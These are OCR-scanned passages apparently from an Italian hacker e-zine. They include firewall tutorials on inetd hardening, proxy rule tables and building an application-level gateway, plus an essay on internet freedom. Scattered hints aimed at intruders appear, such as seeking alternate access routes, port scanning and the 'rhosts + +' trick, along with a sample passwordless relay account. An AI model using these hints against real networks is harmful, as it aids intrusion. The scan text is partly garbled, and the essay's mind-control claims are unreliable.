Generalmente i Firewall di questa categoria risultano molto veloci 
trasparenti all'utente. 


I Firewall di tipo Application Level invece, sono macchine in cui 
viene fatto girare un Proxy server, la cui caratteristica piu' 

evidente e' data dal fatto di non permettere il passaggio di dati 
**direttamente** tra le due reti, ma al contrario permette a questa 
operazione una serie di sofisticati controlli di tracciamento e di 
logging dei pacchetti. Inizialmente questi Firewall erano abbastanza 
pensantucci dal lato client, ma ora la situazione sta 

cambiando. La caratteristica piu' importante di questa 

tipologia di Firewall e' la possibilita' di avere dei dettagliati 

report su tutto il traffico transitato attraverso esso. 


Concludo questa prima parte con un'osservazione di carattere pratico 
apparentemente banale; un Firewall puo' essere un ottimo aiuto ai 
Sysadmin per garantire l'integrita' degli accessi alla propria rete, 

ma non bisogna dimenticarsi una cosa: "lui" mette il naso e controlla 
tutto quello che gli passa attraverso..ma SOLO quello..nel caso in cui 
per qualche fortuito motivo dovesse esserci un'altra via di accesso, 

il suo compito decade immediatamente, quindi prima di provare a fare 
fesso un Firewall conviene cercare in maniera quanto piu' approfondita 
possibile un'altra via di accesso. 


SeE Ya!!:) 


Il prossimo articolo che leggerete non riguarda uno strano metodo di 
infiltrazione ne' l'ultima scoperta in campo telefonico. 

Sono semplicemente alcune considerazioni del nostro Jack McKrak su tema 
della liberta' in Internet. 

Lo abbiamo voluto pubblicare ugualmente sebbene non sia del tutto attinente 
ai temi trattati in questa rivista...sebbene la liberta' e' un po' dentro 

ad ogni hacker... 


Psicologia Costrittiva (Jack McKrak) 


Liberta': la capacita' di poter scegliere qualcosa, senza essere 

condizionati da agenti esterni... 

Una definizione semplice ma ragionevole, sono libero se voglio fare qualcosa 
e nessuno me lo impedisce, tranne ovviamente, quando interferisco con la 


liberta' di qualcun altro...Trasportando questa definizione nel mondo di 
Internet, la nostra liberta' si esprime nella possibilita' di visitare 

qualsiasi sito o accedere a tutte le informazioni sparse nella rete, senza 
che qualcuno mi dica cosa sia lecito vedere o ignorare... 

Chiariamo subito il discorso: io non ho il diritto di usufruire di 
informazioni che qualcuno immette sulla rete e che non vuole rendere 
pubbliche, come dati personali o servizi offerti a pagamento... chi si 
intrufola in database privati lo fa a proprio rischio e pericolo... 

Ho pero' il diritto di poter ascoltare le idee e le opinioni di chiunque 
abbia qualcosa da dire, senza che queste vengano filtrate o modificate; ho 
anche il diritto di conoscere notizie che potrebbero essere utili a me 
stesso o alla comunita', ma che vengono tenute segrete per proprio comodo... 


Ogni tanto, nel mondo, c'e' qualcuno che si sveglia con la voglia di 
migliorare la propria vita, a discapito di quella di qualche altra persona. 
Pensiamo di essere il classico conquistatore pazzo che ha del potere e vuole 
allargare il suo consenso, Internet rappresenterebbe un grosso problema: 

se milioni di persone si scambiano delle idee e' difficile evitare che si 
uniscano in gruppi che non la pensano come me, anzi, magari fanno cambiare 
idea a quelli che avevo gia' convinto...come si puo' sfruttare la rete a 

proprio comodo? Un impatto affrettato porterebbe a un approccio violento, 
censurare i siti non allineati all'ideologia ed escudere le persone non 
desiderate... una logica vecchia e controproducente. E' facile fermare 
qualcuno quando le sue intenzioni sono chiare...oggi i sistemi per persuadere 
gli altri sono molto piu' astuti e potenti, le pubblicita' ne sono un esempio 
ridotto ma significativo. Esistono anche materie di studio che si occupano di 
questo problema, come la Psicologia Costrittiva... in questa disciplina si 
definisce "persuasione" la capacita' di fare credere ad una persona che il 
proprio bene si raggiunga seguendo le istruzioni impartite; in questo modo 
non si e' costretti a sceglire qualcosa contro la propria volonta', ma la 

nostra liberta' ci porta sulla strada sbagliata pensando che sia quella 

giusta. 


Sono stati studiati gli effetti di droge e torture per potenziare 

procedimenti di questo tipo (vedi lavaggio del cervello), solo per citare 

i metodi piu' invasivi...infatti fra quelli piu' sottili possiamo citare i 
messagi subliminali, l'effetto ipnotico dei flash ( chi fa comizi a volte si 
mette addosso oggetti luccicanti, tipo spille d'oro, in modo che questi 
riflettano negli occhi la luce dei fari e inducano il cervello in uno stato 
ipnotico ), suoni a particolare frequenza che provocano un senso di "sballo" 
(si dice che in alcune discoteche modificavano la musica aggiungendo questo 
effetto per aumentare il rincoglionimento prodotto dalle pasticche & co.), 
messaggi ripetuti in continuazione (effetto pubblicitario) e infine, 

l'ultimo ritrovato : l'effetto sondaggio. Ovvero se ti dicono che il 90 % 
degli italiani la pensa in un certo modo sei portato a pensare che 
effettivamente quella sia l'idea migliore... nonostante non sia vero.... 


Concentrando il discorso su Internet, bisogna tenere anche in considerazione 


il fattore "dipendenza da Software". Lo sviluppo delle interfacce 
user-friendly, dove mouse e menu' a tendina sono all'ordine del giorno, sta 
portando al totale annullamento delle conoscenze necessarie per utilizzare 
il computer e Internet senza usufruire delle comodita' a cui siamo soliti... 

la normalizzazione del software porta al completo rincoglionimento 
informatico, ovvero non si e' in grado di far niente se non si usa il solito 
sistema operativo, con il solito programma di interfaccia... anzi la cosa 
peggiore e' che questa dipendenza dai programmi porta internet a dipendere 
da chi produce questi software (i migliori amici del nostro dittatore pazzo), 
che sono in grado di imporci le loro scelte senza che noi possiamo dire una 
parola. In questo modo Internet non e' piu' un ostacolo, anzi, diviene la 
vera incamzaione del Grande Fratello, in grado di condizionare tutti e tutto. 


Ancora la situazione e' normale, ma bisogna stare all'erta, essere 

in grado di scavalcare i muri che ci troviamo davanti ed evitare che qualcuno 
ci espropri delle liberta' di cui godiamo oggi... state informati, e con gli 
occhi aperti.. finche' potete leggere giornali come questo c'e' sempre della 
speranza... 

Nell'articolo precendente abbiamo visto una panoramica generale su cosa 
sia un firewall e come opera, questa volta cercheremo di vedere e capire 
piu' da vicino i settaggi che possono determinare la sicurezza/insicurezza 

di un firewall ed eventuali servizi aggiuntivi che un firewall puo' svolgere. 
Premettendo che un firewall per essere ragionevolmente sicuro deve essere 
installato su una macchina dedicata, a meno che non siano previsti servizi 
tipo FTP (distribuzione aggiornamenti, listini, ecc.), come accennato la volta 
scorsa, la prima cosa che un amministratore di sistema, che si appresta a 
montare un firewall, deve fare e' di sospendere tutti i demoni non necessari; 
questo per fare si che il sistema sia il piu' "leggero" possibile e soprattutto 
per chiudere tutte le connessioni TCP provenienti da porte non necessarie. 
Per fare cio' bisogna modificare il file /etc/inetd.conf; vediamo di seguito 
un estratto di tale file: 


#ident "@(#)inetd.conf 1.22 95/07/14 SMI" /* SVr4.0 1.5 */ 

. Configuration file for inetd(1M). See inetd.conf(4). 

. To re-configure the running inetd process, edit this file, then 

# send the inetd process a SIGHUP. 

; Syntax for socket-based Internet services: 

# <service_ name> <socket_type> <proto> <flags> <user> <server_pathname> <args> 
. Syntax for TLI-based Internet services: 

. <service_name> tli <proto> <flags> <user> <server_pathname> <args> 

. Ftp and telnet are standard Internet services. 

# 


ftp stream tcp nowait root /usr/sbin/in.ftpd — in.ftpd 
telnet stream tcp nowait root  /usr/sbin/in.telnetd in.telnetd 
time stream tcp nowait root internal 


Come si puo' notare sono elencati diversi deamon (la lista completa $ in 
genere composta da una ventina di deamon), che in questo caso sono tutti 
attivi: per eliminarli non bisogna far altro che inserire un commento (#) 
all'inizio della riga in cui sono definiti. 

Questo file pero' per noi che siamo fuori dal sistema ha una utilit... relativa 
in quanto nel momento in cui riusciamo a darci una occhiata significa che 
siamo dentro il sistema e quindi siamo a posto!!8) 

Per chi e' fuori l'unico modo di vedere quali porte sono state lasciate aperte 
e' di utilizare uno dei tanti Port Scanner, che una volta lanciato ci 
elenchera' tutte le porte disponibili, comprese quelle lasciate aperte dai 

vari servizi di start up e dal kernel (che non sono elencati nel file appena 
visto) tipo mountd, nfsd, rstatd, portmap ecc.. 

Un'altra cosa da verificare, e' vedere se e' stato disabilitato l'IP 

forwarding. Il firewall, essendo collegato a due reti, ha ovviamente due 
interfacce di rete, e se l'IP forwarding non e' stato disabilitato tutti i 
pacchetti che arrivano ad una interfaccia, e sono destinati ad una LAN 
diversa da quella di provenienza (che potrebbe essere anch'essa protetta 

dal firewall), vengono ritrasmessi a tutte le interfacce disponibili, compresa 
quella che comunica con il "mondo esterno", senza dover passare per il proxy, 
di conseguenza tutto il potenziale del firewall viene a cadere. 

Ma il vero cuore del sistema e' la rule table cioe' quel file (in genere 
lusr/local/etc/netperm-table) dove sono inserite tutte le regole di accesso 
alla rete che vengono usate dai proxy dei vari servizi. 

Il file in questione e' un file testo in cui in ogni riga e' presente una 

regola di accesso; la sintassi ed i paramentri delle varie regole sono diverse 
a seconda dei vari servizi e dei tipi di proxy usati, ma piu' o meno ricalcano 
questo schema: 


<nome proxy> <permit/deny> hosts <xxx.xxx.xXxx> -exec <path+argomenti> 


<nome proxy> : identifica il servizio a cui va applicata la regola 
<permit/deny> hosts <xxx.xxxX.XXX> : permette o meno l'accesso ad un IP o un 
gruppo di IP 
-exec <path+argomenti> : specifica il percorso e gli eventuali argomenti 
del programma che gestisce il servizio (demone) 


A questi parametri possono esserne aggiunti o eliminati alcuni a seconda 
del proxy utilizzato. 

Concludiamo infine questa breve panoramica sui firewall ricordando che un 
sistema di questo tipo puo' essere usato anche come protezione contro 
attacchi ICMP e flood in genere; basta aggiungere delle opportune regole 
alla rule table; in genere e' sempre opportuno inserirle...non si sa mai.. 

la Rete e' piena di lamer che si divertono con poco..... 


.SeE Ya.. 


P.S. Visto che certa gente si $ lamentata del fatto che per l'articolo del 

numero precendente avevo preso spunto dalla Firewall FAQ di Marcus J. Ranum, 
vorrei fare notare che, almeno che voi il vostro Know-how non lo prendiate in 
pillole, da qualche parte le informazioni vanno lette e di conseguenza visto 

che tale documento esponeva alcuni concetti molto bene ho ritenuto opportuno 
usarlo come base del mio discorso. Sempre per la cronaca l'articolo che avete 
appena letto, non ha preso spunto da niente se non dalla mia personale 
esperienza. 
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1) INTRODUZIONE 


Questo testo servira' a chi come me si e' interessato di firewalls in quanto 

nella sua universita' se ne è montato uno e quindi ( un pò per forza 

e un po' per diletto ) uno si deve interessare a certe cose che gli accadono 
intorno :-) 

Questo testo non ha uno schema preciso e sarebbe piu' un memorandum di quello 
che sto' facendo io in questo momento dato che ora un firewall sulla mia 
macchina non esiste . 

Non ci interesseremo solo di come installare un firewall ma anche di come 
migliorare la sicurezza del nostro sito ed eventualmente dei consigli su 

come Improvare :-) ossia migliorare la sicurezza 

del proprio sito e creare ( nel nostro piccolo ) una vera e propria " ETICA 
DELLA SICUREZZA DIGITALE" cosa che in Italia in questo periodo manca e 
manchera' per un bel po' di tempo. 


Perdonatemi quindi le mille e mille cretinate che scrivero ' in questo testo e 
andiamo avanti . 


2) CHE COSA E' UN FIREWALL 


Noi intenderemo un firewall come una collezzione di componenti che si piazzano 
in mezzo a 2 reti ( e noi assumeremo Internet e la nostra piccola rete ) che 
possiedono le seguenti propieta' 


A) Tutto il traffico di dati entrante ed uscente dalla rete interna e 
viceversa deve passare attraverso il firewall. 


B) Solo il traffico autorizzato puo' passare impunemente attraverso il 
firewall 


C) Il firewall e' immune ( o almeno si spera ) alle penetrazioni 
illegali 


Non male vero? Ora passiamo ad analizzare i vari svantaggi e vantaggi ad usare 
una macchina ( e quindi investimenti ) configurata come firewall. 

Una ottima ragione per montare dei firewalls e' che dedicare e concentrarsi su 
una macchina sola e interessarsi in buona parte della SUA sicurezza e' molto 
meglio che guardare tutta la sicurezza di una rete intera , magari costituita 

da computers di marche differenti .....quindi 

dedicare una macchina SOLO a questo scopo e' ben piu' vantaggioso che usarne 
una general purpose e dirsi TANTO A ME NON MI SFONDANO !!! Tutta la mia 
attenzione dopo sarta' dedicata a curarmi della mia rete e non della sua " 
sicurezza" ( anche se ...... mah) . 

La seconda ( che e' anche lo scopo di questo testo e' che comunque una persona 
che si occupa di firewall HA una coscienza di sicurezza ,cosa che i sistemisti 

di ben piu' che mezzo mondo non hanno. 


3) FILOSOFIA DEI FIREWALLS 


Siamo quindi ben piu' precisi ...... lo schema di un firewall e' il seguente : 
e ie e | 
| | IAA, 
| | GATEWAY | | 
| | | | 
e o e | 
Rete Filtro Filtro Rete 


Interna Esterna 


Filtro : blocca le trasmissioni di certe classi di dati 
Gateway: macchina/e che provvede ai servizi per compensare l'effetto del 
filtro 


Generalmente si dice che la zona protetta o rete interna si chiama ZONA 
DEMILITARIZZATA ( nota che un gateway possono essere piu' macchine e quindi 
essere divise in esterne od interne, le esterne sono detti BASTIONI) 

Anche il piazzamento di questi firewalls e' una cosa molto importante , e' 

facile dire da un mondo interno ad uno esterno, ma in grosse aziende 

e' utile tante volte ISOLARE I DOMINI in termini 

di sicurezza e quindi di MODULARIZZARE a livello ingegneristico la rete di 
casa nostra individuando le varie aree di impiego . 

Le ragioni di questo fatto sono che gli impiegati stessi possono essere 

abilitati o meno a certi dati . 

Noi potremo quindi vederci i nostri firewalls come grossi DIODI o DIGHE che 
isolano i dati come piu' lo preferiamo. 


Andiamo con le prime classificazioni: 
Un firewall e' suddiviso come 


a) Packet Filtering . 
Poco costoso e facile da reperire e' semplicemente il NOSTRO ROUTER e il 
suo software .....(NB le aziende dovrebbero averne uno) Il nostro 
installatore dovra quindi per esempio avere una lista dei siti autorizzati 
o meno, ma non solo ...saremo in grado di definire se dal sito 
pippo.pluto.it vogliamo ricevere soltanto mail. 
Configurare un Packet Filtering possiamo dire che e' una operazione di 3 
passi 


1) DECISIONI su cio' e non cio' che e' permesso . 
2) definire tipi ammessi di dati in termini di operazioni logiche 
3) Riscivere queste regole nel tuo sistema operativo . 


esempio ....porta 25 SENDMAIL dalla rete a SOLO il tuo Gateway 


Azione NostroHost porta lorohost porta commento 


block - - CATTIVI - Non li vogliamo 
allow Nostro-gw 25 - - connessione al SMTP 


Pacchetti non esplicitamente espressi da una regola precedente sono 
bloccati automaticamente ( KOOL!!!!! :-) ) 
La filosofia di base e' questa : 


QUELLO CHE NON E' ESPRESSO NON E' PERMESSO. 
NNNNANNNANANANANNANANANANANAANANAANANNANANAN 


ancora meglio sarebbe permettere chiamate uscenti alla porta 25 


action source port dest port flags commento 


allow Noi -  - 25 collegamento noi-loro SMTP 
allow - 25 - - ACK lororisposta 
Supponiamo l'FTP 


action source port dest port flags commento 


allow noi per uscire 
allow ack perrisposta 
allow >1024 traffico non FTP 


Supponiamo ora di filtrare sessioni X11 


Dovremo sapere tutti che per x abbiamo bisogno di un server al quale x11 si 
connette via TCP , e che inoltre certe applicazioni devono poter essere 
pilotate dall' esterno. 

In questo caso consigliamo di bloccare tutte le chiamate in ingresso sulle 
porte 6000-6100 almeno ( dipende dal numero di utenti ) . 


b) Application level gateways 


Usato in unione agli altri 2 come protezione aggiuntiva minimale per 
esempio nel caso dell' X11 visto sopra ..... 

Svantaggio / Vantaggio e' che e' molto generale e che quindi se noi 
useremo programmi molto particolari non serve a molto. 

E' come se avesse gia' un DB di liste come le precedenti a seconda di cio' 
che ho lanciato nel mio sistema. 


c) Circuit level Gateways 


(Il migliore per chiamate in uscita) controlla solamente connessioni TCP . 

Il chiamante chiama una porta del gateway con TCP che lo connette con 
qualche cosa all' infuori della rete . Durante la connessione il GW registra 
tutte le azioni commesse dal malcapitato ( caso mia univ.) .Funziona come se 
fosse un filo . La connessione puo' essere automatica e espressa direttamente 
dall' utente (In questo caso il GW si chiama PROXY). Non e' 

necessario loggare tutto cio ' che esce ...ma basterebbe gia'il numero di bytes 
e la destinazione per una ottima loggatura . Greppando su un utente o su siti 
si scopre che cosa ha combinato il CONTROLLATO .:-) 


Naturalmente potremo dire il tempo di connessione ( cosa che da noi non 


fanno) e una lista di utenti abilitati all'accesso dall' esterno . 


4) COSA NON POSSONO FARE I FIREWALLS 


Anche loro hanno delle limitazioni ...come tutti del resto . 

Per esempio sono completamente indifesi agli attacchi su porta alta come puo' 
essere il peeking ....ma se il GW rifiuta connesioni X11 siamo a posto . 

Anche una corretta manutenzione del nostro gateway e' importante ....se ce ne 
freghiamo della sicurezza dei nostri programmi tali che possono essere 

Sendmail Telnetd etc etc non montiamoci un firewall ...e' un aiuto ma non 

e' la soluzione ;e' un programma anch'esso come tutti gli altri e quindi 

baggato come tutti gli altri. 

Comunque per un attacco medio della stragrande maggioranza dei Lamahs e' ben 
piu' che sufficiente ..... 


5) ed ora quel che tutti aspettavano .......... 
COSTRUIRSI UN APPLICATION LEVEL GATEWAY 


Tratteremo l'analisi di costruzione di un Application level gateway con 
sicurezza ad alto livello . Nota che il seguente viene usato ( teoricamente ) 
dall'At&T. 

Considereremo basilari : 

1) Un computer unix (LINUX RULEZZ) :-) 

2) Routers 

3) software tools descritti sotto 

4) demoni di network trovabili su Internet ...( solo versioni recenti) 


La costruzione descritta dovrete adattarvela al vostro computer . 


Assumeremo che : 


- Gli utenti si sappiano tenere i dati di sistema tipo passwd e altro per loro 
conto senza spedirli in giro per il mondo 


- Le password non saranno idiote 
- Gli hacker che ci attaccano sono hacker " normali "... non dei geni !. 


- I dati interni sono di media importanza. 


Abbiamo 3 sottotipi corrispondenti a 3 livelli di sicurezza crescenti : 


---------- Inside-------GW-.----------Router--------------INTERNET (A) 


-Inside----GW-Inside----Privatenet----GW-Outside--Router--INTERNET 


-GW-Inside----- Inside----- Router------ GW-Outside--Router--INTERNET 
(choke) 


5.1) INSTALLAZIONE INIZIALE 


Iniziamo a dire che i comandi del firewall devono essere dati in maniera 
fisica e direttamente dalla console del GW .. un accesso fisico e' ben piu' 
difficile di uno da Internet per un hacker. 


Durante la configurazione iniziale ha senso connettere gli host a una rete 
"sicura" quindi: 
- Per A) e B) spegnere IP forwarding e source routing dai kernels . 
Per C) non e' un passo importante , ma si deve essere sicuri che i 


dati non passino attraverso il router choke 


- Il kernel ha bisogno di alcune configurazioni aggiuntive. 


(B) 


(C) 


*e' configurato per un numero sufficente di processi? un migliaio e' OK 


per una rete gia' tosta. 


*eliminare eventuali assegnamenti di limite di uso CPU ai processi del 


GW . 


*verificare che vi siano sufficenti mbuf configurati ..dato che li 
useremo spesso. 


- abbondare con la memoria ...32 mega e' il MINIMO. 
- settare accuratamente lo spazio di SWAP . 
- cancellare tutti i servizi di network , commenta /etc/inetd.conf. 


- togliere TUTTI i compilatori. 


- eliminare programmi con lo sticky bit non necessari o non capiti. 


- eliminare accounts non voluti dalla macchina , non vi deve essere 
nulla se non root e passwords usuali di amministrazione . 


- riavviare e netstat -a per verificare che tutti i servizi non sono 
piu' presenti. 


- settare /etc/motd per avvertire gli utenti del log continuo e 
persecutorio ....motivi legali e psicologici. 


- Configurare le partizioni dell' HD ..ricordati che fuori possono 
leggere logs diretory di spool e ftp directory quindi tutte queste 
devono finire su partizioni diverse. 


- connettere l'host alla rete esterna. 


- aggiungere l'entrata ARP del router agli host . se il router non 
annuncia le sue informazioni di ARP solo i nostri 2 hosts sapranno come 
raggiungerlo. 


- Sull' host esterno aggiungiamo il classico routing di default. 


- Salva tutta la configurazione degli hosts e mettila sottochiave . 
considera attentamente l'idea di un backup giornaliero. 


Configuriamo il Choke ossia il router il quale ha una configurazione strana in 
quanto abbiamo 2 hosts che lo possono usare .. Quindi : 


- eliminare l'accesso di telnet dal router , se si possiede un cisco 
cio' vuol dire che i controlli del cisco stesso saranno svolti solo 
dalla console. 


- eliminare accessi all ARP dal router , in particolare il router non mi 
deve rispondere alle richieste di ARP tipo: 


no service_finger 
no ip redirects 

no ip route-cache 

no ip proxy-arp 

no mop enabled 

no ip unreachables 


- istallare nella ARP degli accessi per gli hosts interni ed estemi , 
nota come non sia necessario un routing ...infatti lui si connette 
solamente con le networks locali. 


- Settare un filtro di pacchetti che nega tutti gli accessi agli hosts 
interni . 


- per sicurezza estrema bloccare anche tutti i pacchetti diretti all' 
indirizzo ethernet del choke . 


Sembra facile vero? considerate che avete appena configurato le macchine in 


5.2) GATEWAY TOOLS 


Abbiamo disponibili in rete alcuni " Tools " essenziali freeware per la 
costruzione del nostro gateway . 
Prendiamoli in analisi : 


TCP WRAPPER : Sappiamo ( o almeno dovremo saperlo ) che in un sistema Unix 
------_- abbiamo alcuni demoni uno tra i quali Inetd e' in attesa di 
eventuali connessioni dall' esterno , pronto ad attivare 
i programmi relativi al tipo di connessione richiesta. 
Quindi il nostro gateway li dovra' attentamente valutare ( 
letc/inetd.conf ). Per esempio abbiamo che : 


# 

#Procedure interne 

# 

echo stream tcp nowait root internal 
dischard stream tcp nowait root internal 
chargen stream tcp nowait root internal 
daytime stream tcp nowait root internal 
time stream tcp nowait root internal 
echo dgram udp wait root internal 
dischard dgram udp wait root internal 
chargen dgram udp wait root internal 
daytime dgram udp wait root internal 
time dgram udp wait root internal 
# 

#Servizi Reali 

# 


ftp stream tcp nowait /usr/sbin/ftpd wu.ftpd 


Abbiamo che quindi questo file e' di enorme importanza per la 
nostra configurazione . 

Il Tcp Wrapper provvede a effettuare un controllo sulle 
connessioni quindi se noi modificheremo la precedente come : 


ftp stream tcp nowait root /gatew/tcpd /usr/sbin/ftpd 


il nostro wrapper controllera' in /etc/hosts.allow se accettare 

la connessione . 

Questo pacchetto serve quindi per determinare eventuali politiche 
di connessione del nostro gateway 


RELAY : E' una applicazione propria degli Apllication-Level per loggare 
----- tutte le connessioni che il nostro computer effettua all' esterno 
Supponiamo quindi di voler offrire al mondo la nostra stampante 


vedi sempre /etc/services) abbiamo che quindi il /etc/inetd.conf 
dovrebbe essere : 


printer stream tcp nowait daemon /gatew/relay tcp!pserver! printer 


quindi abbiamo che pserver ,un programma che copia i bit in 
entrambe le direzioni di ingresso e in uscita, abilita la 
connessione . 


TELNETD  : Non staro' esattamente a discquisire sul fatto che le versioni 
----- aggiornate sono da preferirsi a quelle vecchie .:-) Possiamo 
inoltre far notare come piazzando un RELAY visto prima in 
maniera da loggare il Telnetd e quindi vedere cosa i nostri 
utenti effettivamente fanno non e' male .....ma alla mia 
universita' queste cose TROPPO SEMPLICI non si fanno ....quindi 
si preferisce TOGLIERE IL TELNET.....che e' piu' sicuro 


con eventuali forme piu' avanzate con le quali MAGARI ci potremmo 
anche permettere di LIMITARE I LOGIN ESTERNI come tempo di Cpu 


SERVIZI FTP : Come precedentemente discusso avremo che inoltre possiamo 
------ permetterci di usare il GW come PROXY e quindi di creare links 
nuovi di zecca ( e ampiamente loggabili ) 


5-3 INSTALLAZIONE DEI SERVIZI 


L'installazione dei servizi penso che sarebbe la parte piu' noiosa e piena di 
verifiche sotto verifiche etc che tutta la installazione del firewall puo' 
offrirci ..ma tante' ...se deve fa' ! 

Nota che all 'inizio di questa fase abbiamo bisogno di TUTTI gli IP numerici 


della nostra rete ...altrimenti sono cavolacci quando , se per pura sfiga , il 
nostro computer cerca di fare un resolve . 


MAIL : Abbiamo che naturalmente sara' il nostro GW a prendere e mandare la 
--- posta .....quindi cio' significa che deve essere correttamente 
configurato per sopportare qualsiasi tipo di errore. 
Supponiamo che la posta viene salvata su un computer apposito 
detto PIPPO configurato con tutti gli uucp che servono . 
Vogliamo che quindi ( SFATICATI ) la posta arrivi su PIPPO attraverso 
il GW. 


- Configuriamo il mailer esterno se possiamo a ricevere posta sulla 
26 per esempio . 


- Sul computer CHOKE 
action src port dest port flags comment 


allow EXTERN >1023 GW 26 
allow GW 26 EXTERN >1023 ACK 


che mi accetta la connessione . 
Quindi aggiungeremo in /etc/inetd.conf 


port26 stream tcp nowait daemon /gatew/tcpd /gatew/relay tcp!PIPPO!25 
Fico vero? Non dimenticate di connettere la porta 26 in 

letc/services 

Per una connessione diretta con l'esterno abbaimo che 

action src. port dest port flags comment 


allow GW >1023 EXTERN 25 
allow EXTERN 25. GW >1023 ACK 


TELNET ‘Possiamo permettere a degli utenti autorizzati fuori dal sistema di 
---- effetturare connessioni dentro il sistema magari con login sonoio :-) 

Il relay connette l'utente con il programma di autenticazione di 

PIPPO e se il login e' OK l'utente puo' fare un rlogin dove vuole. 

Quindi : 

- mettiamo sonoio nel passwd 


sonoio::500:501: LOGIN ESTERNA:/gatew/usr/sonoio:/gatew/sonoio.sh 


- il demone di telnetd 


telnetd stream tcp nowait root /gatew/tcpd /usr/sbin/telnetd 
- vediamo ora /gatew/sonoio.sh 


#!/bin/sh 
/gatew/relay tcp!PIPPO!666 


- e relative connessioni per il choke 
action src. port dest port flags comment 


allow GW >1023 EXTERN 666 
allow EXTERN 666 GW  >1023 ACK 


- il servizio in PIPPO 
port666 stream tcp nowait root /gatew/sonoio sonoio 


- aggiungere porta in /etc/services 


PROXY : installazione : 


- in PIPPO per EXTERN . Useremo la porta per es 402 qui di la dovremo 
aggiungere in /etc/services e /etc7inetd.conf 


- sempre il choke (uff...) 
action src. port dest port flags comment 


allow GW >1023 EXTERN 402 
allow EXTERN 402 GW >1023 ACK 


- in EXTERN 
proxy stream tcp nowait daemon /gatew/tcpd /gatew/proxy 


-sempre in EXTERN aggiungi la 402 in /etc/services 


Considero sempre una installazione minima ..altri servizi a piacimento sono 
comunque sulla stessa linea. 


5-4 X11 


Per questo sevizio che comunque e' sempre molto pericoloso in quanto consente 
di controllare in modo remoto il video , mouse , tastiera etc , abbiamo una 
serie di pacchetti che comunque non sono di difficile reperibilita' tipo : 


xp11 - xgate : Per esempio :connetto il server X11 che risiede sulla 6000 + un 
numero random e trasmetto il risultato al mio xp11 il quale genera 
un X11 $DISPLAY per quella porta . 
Se mi giunge una richiesta questa e' compito della xgate che crea 
un socket random anche in questo caso e informa internamente xp11 
di cio'. Se l'utente e' autorizzato ( configurazione xgate) si 
crea il collegamento. 


5-5 E CHI PROTEGGE IL GATEWAY? 


Abbiamo che un largo uso di servizi sono gia' protetti dal tcp wrapper stesso, 
ma servizi richiesti per esempio da localhost o 127.0.0.1 possono essere 
comunque disabilitati mettendosi cosi' se' stessi nella lista di un possibile 
nemico . 

Abbiamo possibili attacchi sulla nostra syslog , e quindi noi potremmo 
controllare il demone e uploadarlo sovente . 


Anche il choke e' un elemento vulnerabile del nostro sistema. quindi dovremo 
disabilitare tutte le chiamate a questo computer ....quindi : 


action src port dest port flags comment 


block 127.0.0.1 no loopback 
block 514 no syslog 

block choke no choke 

block PIPPO no pacchetti a pippo 
allow tutto il resto OK 


6 AMMINISTRAZIONE DEL GATEWAY 


Prendiamo atto che anche il nostro mitico gateway e' una macchina e quindi 
avra' bisogno di manutenzione ....quindi let's start..: 


6-1 Logs : i log creati dal GW possono crearci una serie di problemi in quanto 
mentare se la nostra rete e' massiccia essi diverranno di proporzioni esagerate 
... mediamente 20 30 mega al giorno !!! Quindi da cui il problema 
di prendere solo le informazioni necessarie e fondamentali . 


Ovviamente tanto per dire un accesso illegale dall' esterno o 
comunque per esempio un tentativo errato di login tipo root o una 
lettura del passwd . Anche la locazione di questo file e' una fase 
critica del progetto in quanto deve risiedere in una macchina 
interna e ben protetta , invece di risiedere all' esterno e quindi 

di possibili modifiche da parte di incursori esterni brutti e 

cattivi . 


6-2 Integrita' dei Files : Un buon backup dei propri dati e' un imperativo da 
ene esere rispettare sempre allo scopo di poter ripristinare 
il sistema. Un altro concetto sempre legato al backup e' 
quello di monitorare costantemente il nostro sistema . 
Possiamo vedere attraverso i files vecchi come il sistema e' 
cambiato dalle volte precedenti ....anche per cause non- naturali 
tipo accessi illegali ...vedasi RootKit Attacks e le varie 
directory tipo bin root e uucp ( il vecchio giochetto del rhosts + + 
e' sempre valido ) e anche i vari lavori di cron eseguiti di notte 
tipicamente . 
Considerate di iniziare a usare pacchetti tipo il TRIPWIRE . 


6-3 Altro : - Come fa' root a loggarsi sul gateway? A parte concedere l'accesso 
----- alla console solo a root si potrebbe consigliare telnetd protetti 
dal tcp wrapper. 


- Attenzione ai trasferimenti di file binari via FTP .....anche 
dall' interno . 


- Cambiare se possibile i nomi di file di log. 
- Loggare se possibile i tentativi di intrusione. 


6-5 Riassumendo : 

- Ftp : protetto da chroot , nessun privilegio. 

- SMTP : per la posta e il talk usare possibilmente SOLO l' UPAS 
..un pacchetto piu' sicuro del sendmail ma meno noto . 

- Telnet : connesso direttamente all' interno ma a un programma che 
effettua l'autenticazione . 

- Printer : protetta dal tcp wrapper 

- Proxynfs : protetto dal wrapper , eseguito dall' interno in una 
directory con il chroot 

- Telnet verso esterno : protetto dal wrapper , accesso dall' 
interno , deve sfociare in un menu' del proxy . 


NB ...uno dei pacchetti liberamente accessibili per l'applicazione di queste 

piccole regole esistenziali e' il TIS FIREWALL TOOLKIT che implementa benissimo 
un Application level ed e' studiato per l'uso su macchina singola . Abbiamo 
protezione estrema per Rlogin Telnet e Ftp . I nostri cari utenti potranno 

quindi uscire sulla Rete sulla porta corrispondente del nostro gateway 

.Possiamo inoltre permettere autenticazioni tipo utente@destinazione . Il 

traffico di sendmail e' controllato da un programma particolrare che impedisce 
l'accesso a demoni BAGgati . 


Ftp anonimi sono in una bella directory chroot con un passwd differente da 
quello reale e solo per accessi ftpd . 


7- SOFTWARE UTILI : 


Dunque.... un hacker trova la maggior parte delle sue info su internet ....bene 
...anche noi andremo a prendere le nostre proprio la' . 


TCP WRAPPER 
ftp.win.tue.nl /pub/security/tcp_wrapper 


SECURELIB ( addon per SunOs per eliminazione inetd) 
eecs.nwu.edu /pub/securelib.tar 


TIS FIREWALL TOOLKIT 
ftp.tis.com /pub/firewalls/toolkit 


PROXY X11 
crl.dec.com /pub/DEC/xforward.tar.Z 


IDENTD DAEMON 
ftp.uu.net /networking/ident 


SWATCH ( associazione azioni con logfiles) 
sierra.stanford.edu /pub/sources/swatch.tar.Z 


SCREEND ( converte il nostro sistema in un filtratore di pacchetti) 
gatekeeper.dec.com /pub/DEC/screend/screend.tar.Z 


TRIPWIRE (controllo pacchetti alterati) 
ftp.cs.purdue.edu /pub/spaf/COAST/Tripwire 


subscribe firewalls tuo_email 
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Le informazioni contenute in questo testo si intendono a uso FORMATIVO e NON 
devono essere usate ne' a scopo di lucro (previa autorizzazione del creatore) 

ne' tantomeno a scopo distruttivo . 

Non si intende assumere ALCUNA RESPONSABILITA' per quanto potrebbe derivare 
dall' applicazione di quanto scritto e riportato in questo testo . 


